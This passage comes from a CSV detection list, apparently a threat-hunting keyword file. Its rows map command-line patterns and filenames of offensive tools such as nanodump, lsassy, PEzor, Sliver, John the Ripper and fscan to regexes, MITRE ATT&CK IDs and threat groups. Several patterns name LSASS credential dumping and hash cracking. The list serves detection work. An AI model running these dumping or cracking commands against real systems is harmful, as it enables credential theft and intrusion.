Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","1216" "* --fork --write *.dmp*",".{0,1000}\s\-\-fork\s\-\-write\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","1217" "* ForkDump.cpp*",".{0,1000}\sForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","1218" "* ForkLib.cpp*",".{0,1000}\sForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","1219" "* --format exe * --jitter *",".{0,1000}\s\-\-format\sexe\s\s.{0,1000}\s\-\-jitter\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","1220" "* --format 
kirbi*",".{0,1000}\s\-\-format\skirbi.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1221" "* -format=bof *.exe*",".{0,1000}\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1222" "* -format=bof -cleanup *",".{0,1000}\s\-format\=bof\s\-cleanup\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1223" "* -format=dotnet -sleep=*",".{0,1000}\s\-format\=dotnet\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1224" "* -format=dotnet-pinvoke *",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1225" "* -format=dotnet-pinvoke *.exe*",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1226" "* --format=krb5asrep* --wordlist=*",".{0,1000}\s\-\-format\=krb5asrep.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash 
script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1227" "* --format=netntlmv2 *.txt*",".{0,1000}\s\-\-format\=netntlmv2\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1228" "* --format=NT -w=*_password.txt*",".{0,1000}\s\-\-format\=NT\s\-w\=.{0,1000}_password\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1229" "* -format=reflective-dll *",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1230" "* -format=reflective-dll *.exe*",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1231" "* -format=service-dll *.exe*",".{0,1000}\s\-format\=service\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1232" "* -format=service-exe *.exe*",".{0,1000}\s\-format\=service\-exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1233" "* Found a PwDatabase! 
*",".{0,1000}\sFound\sa\sPwDatabase!\s.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1234" "* Found a PwDatabase! *",".{0,1000}\sFound\sa\sPwDatabase!\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1235" "* fox-info.nse*",".{0,1000}\sfox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1236" "* freelancer-info.nse*",".{0,1000}\sfreelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1237" "* Freeze.rs/*",".{0,1000}\sFreeze\.rs\/.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","1238" "* FROM dbo.C2Agents*",".{0,1000}\sFROM\sdbo\.C2Agents.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","1239" "* FROM LDAPHUNTERFINDINGS*",".{0,1000}\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1240" "* fscan.exe*",".{0,1000}\sfscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1241" "* fscan32.exe*",".{0,1000}\sfscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1242" "* fscan64.exe*",".{0,1000}\sfscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1243" "* fscanarm64.exe*",".{0,1000}\sfscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1244" "* fscanarmv6.exe*",".{0,1000}\sfscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1245" "* fscanarmv7.exe*",".{0,1000}\sfscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","1246" "* ftp-anon.nse*",".{0,1000}\sftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1247" "* ftp-bounce.nse*",".{0,1000}\sftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1248" "* ftp-brute.nse*",".{0,1000}\sftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1249" "* ftp-libopie.nse*",".{0,1000}\sftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1250" "* ftp-log4shell.nse*",".{0,1000}\sftp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1251" "* ftp-proftpd-backdoor.nse*",".{0,1000}\sftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1252" "* FtpSniffer *",".{0,1000}\sFtpSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1253" "* ftp-syst.nse*",".{0,1000}\sftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1254" "* ftp-vsftpd-backdoor.nse*",".{0,1000}\sftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1255" "* ftp-vuln-cve2010-4221.nse*",".{0,1000}\sftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1256" "* FudgeC2 *",".{0,1000}\sFudgeC2\s.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","1257" "* -fullmemdmp -snap & ping 127.0.0.1 -n *",".{0,1000}\s\-fullmemdmp\s\-snap\s\&\sping\s127\.0\.0\.1\s\-n\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1258" "* -FullPrivs * ",".{0,1000}\s\-FullPrivs\s.{0,1000}\s","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and 